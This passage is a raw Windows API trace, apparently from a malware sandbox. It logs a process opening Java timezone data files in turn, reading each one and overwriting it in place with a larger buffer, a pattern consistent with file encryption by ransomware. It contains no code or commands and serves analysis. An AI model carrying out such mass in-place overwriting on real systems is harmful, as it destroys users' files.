lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0139.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Thimphu", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thimphu", lpUsedDefaultChar=0x0) returned 7 [0139.287] ReadFile (in: hFile=0x208, lpBuffer=0x1f9fe28, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fe28*, lpNumberOfBytesRead=0x2fdf2bc*=0x4d, lpOverlapped=0x0) returned 1 [0139.288] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0139.289] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0139.289] CloseHandle (hObject=0x208) returned 1 [0139.289] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yekaterinburg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yekaterinburg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.290] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.290] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x245 [0139.290] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.370] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.370] ReleaseMutex (hMutex=0x168) returned 1 [0139.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yekaterinburg", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yekaterinburg", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Yekaterinburg", lpUsedDefaultChar=0x0) returned 13 [0139.370] ReadFile (in: hFile=0x208, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x245, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2fdf2bc*=0x245, lpOverlapped=0x0) returned 1 [0139.371] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0139.371] WriteFile (in: hFile=0x208, lpBuffer=0x2883298*, nNumberOfBytesToWrite=0x7cd, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2883298*, lpNumberOfBytesWritten=0x2fdf2d0*=0x7cd, lpOverlapped=0x0) returned 1 [0139.372] CloseHandle (hObject=0x208) returned 1 [0139.372] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Reykjavik" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\reykjavik"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0139.385] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.385] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x241 [0139.385] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.385] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.386] ReleaseMutex (hMutex=0x168) returned 1 [0139.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reykjavik", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0139.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reykjavik", cchWideChar=9, lpMultiByteStr=0x1f735ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reykjavik", lpUsedDefaultChar=0x0) returned 9 [0139.386] ReadFile (in: hFile=0x204, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x241, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2fdf2bc*=0x241, lpOverlapped=0x0) returned 1 [0139.391] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0139.391] WriteFile (in: hFile=0x204, lpBuffer=0x287d138*, nNumberOfBytesToWrite=0x7c9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x287d138*, lpNumberOfBytesWritten=0x2fdf2d0*=0x7c9, lpOverlapped=0x0) returned 1 [0139.406] CloseHandle (hObject=0x204) returned 1 [0139.406] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Darwin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\darwin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0139.410] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.410] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7d [0139.410] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.410] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.410] ReleaseMutex (hMutex=0x168) returned 1 [0139.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Darwin", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0139.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Darwin", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Darwin", lpUsedDefaultChar=0x0) returned 6 [0139.411] ReadFile (in: hFile=0x204, lpBuffer=0x1f2f048, nNumberOfBytesToRead=0x7d, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f2f048*, lpNumberOfBytesRead=0x2fdf2bc*=0x7d, lpOverlapped=0x0) returned 1 [0139.412] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0139.412] WriteFile (in: hFile=0x204, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x605, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x605, lpOverlapped=0x0) returned 1 [0139.412] CloseHandle (hObject=0x204) returned 1 [0139.412] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cet"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0139.438] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.438] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4a0 [0139.439] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.439] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.439] ReleaseMutex (hMutex=0x168) returned 1 [0139.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CET", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0139.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CET", cchWideChar=3, lpMultiByteStr=0x1f7ad44, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CET", lpUsedDefaultChar=0x0) returned 3 [0139.439] ReadFile (in: hFile=0x204, lpBuffer=0x288fe58, nNumberOfBytesToRead=0x4a0, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x288fe58*, lpNumberOfBytesRead=0x2fdf2bc*=0x4a0, lpOverlapped=0x0) returned 1 [0139.462] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0139.462] WriteFile (in: hFile=0x204, lpBuffer=0x2870cb8*, nNumberOfBytesToWrite=0xa28, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870cb8*, lpNumberOfBytesWritten=0x2fdf2d0*=0xa28, lpOverlapped=0x0) returned 1 [0139.462] CloseHandle (hObject=0x204) returned 1 [0139.462] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+11" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+11"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0139.463] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.463] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1b [0139.463] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.463] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.463] ReleaseMutex (hMutex=0x168) returned 1 [0139.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+11", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0139.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+11", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT+11", lpUsedDefaultChar=0x0) returned 6 [0139.464] ReadFile (in: hFile=0x204, lpBuffer=0x1f88ba0, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88ba0*, lpNumberOfBytesRead=0x2fdf2bc*=0x1b, lpOverlapped=0x0) returned 1 [0139.465] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0139.465] WriteFile (in: hFile=0x204, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0139.465] CloseHandle (hObject=0x204) returned 1 [0139.465] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+8" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0139.466] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.466] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1b [0139.466] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.466] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.466] ReleaseMutex (hMutex=0x168) returned 1 [0139.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+8", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+8", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT+8", lpUsedDefaultChar=0x0) returned 5 [0139.466] ReadFile (in: hFile=0x204, lpBuffer=0x1f88ba0, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88ba0*, lpNumberOfBytesRead=0x2fdf2bc*=0x1b, lpOverlapped=0x0) returned 1 [0139.468] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0139.468] WriteFile (in: hFile=0x204, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0139.468] CloseHandle (hObject=0x204) returned 1 [0139.468] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-2" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0139.470] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.470] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1b [0139.470] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.470] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.471] ReleaseMutex (hMutex=0x168) returned 1 [0139.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-2", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-2", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT-2", lpUsedDefaultChar=0x0) returned 5 [0139.471] ReadFile (in: hFile=0x204, lpBuffer=0x1f88ba0, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88ba0*, lpNumberOfBytesRead=0x2fdf2bc*=0x1b, lpOverlapped=0x0) returned 1 [0139.472] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0139.472] WriteFile (in: hFile=0x204, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0139.472] CloseHandle (hObject=0x204) returned 1 [0139.473] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UCT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\uct"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0139.473] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.473] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1b [0139.473] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.474] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.474] ReleaseMutex (hMutex=0x168) returned 1 [0139.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UCT", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0139.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UCT", cchWideChar=3, lpMultiByteStr=0x1f7ad44, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UCT", lpUsedDefaultChar=0x0) returned 3 [0139.474] ReadFile (in: hFile=0x204, lpBuffer=0x1f88ba0, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88ba0*, lpNumberOfBytesRead=0x2fdf2bc*=0x1b, lpOverlapped=0x0) returned 1 [0139.475] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0139.475] WriteFile (in: hFile=0x204, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0139.476] CloseHandle (hObject=0x204) returned 1 [0139.476] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Bucharest" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\bucharest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0139.476] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.477] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x49c [0139.477] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.477] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.477] ReleaseMutex (hMutex=0x168) returned 1 [0139.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bucharest", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0139.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bucharest", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bucharest", lpUsedDefaultChar=0x0) returned 9 [0139.477] ReadFile (in: hFile=0x204, lpBuffer=0x288fe58, nNumberOfBytesToRead=0x49c, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x288fe58*, lpNumberOfBytesRead=0x2fdf2bc*=0x49c, lpOverlapped=0x0) returned 1 [0140.730] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0140.730] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa24, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0xa24, lpOverlapped=0x0) returned 1 [0140.730] CloseHandle (hObject=0x204) returned 1 [0140.731] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kaliningrad" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kaliningrad"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0140.732] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0140.732] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2a9 [0140.732] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0140.732] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.024] ReleaseMutex (hMutex=0x168) returned 1 [0141.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kaliningrad", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kaliningrad", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kaliningrad", lpUsedDefaultChar=0x0) returned 11 [0141.025] ReadFile (in: hFile=0x204, lpBuffer=0x25a3b68, nNumberOfBytesToRead=0x2a9, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesRead=0x2fdf2bc*=0x2a9, lpOverlapped=0x0) returned 1 [0141.034] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0141.034] WriteFile (in: hFile=0x204, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x831, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2fdf2d0*=0x831, lpOverlapped=0x0) returned 1 [0141.034] CloseHandle (hObject=0x204) returned 1 [0141.034] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Monaco" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\monaco"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0141.035] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.035] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x628 [0141.035] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.035] 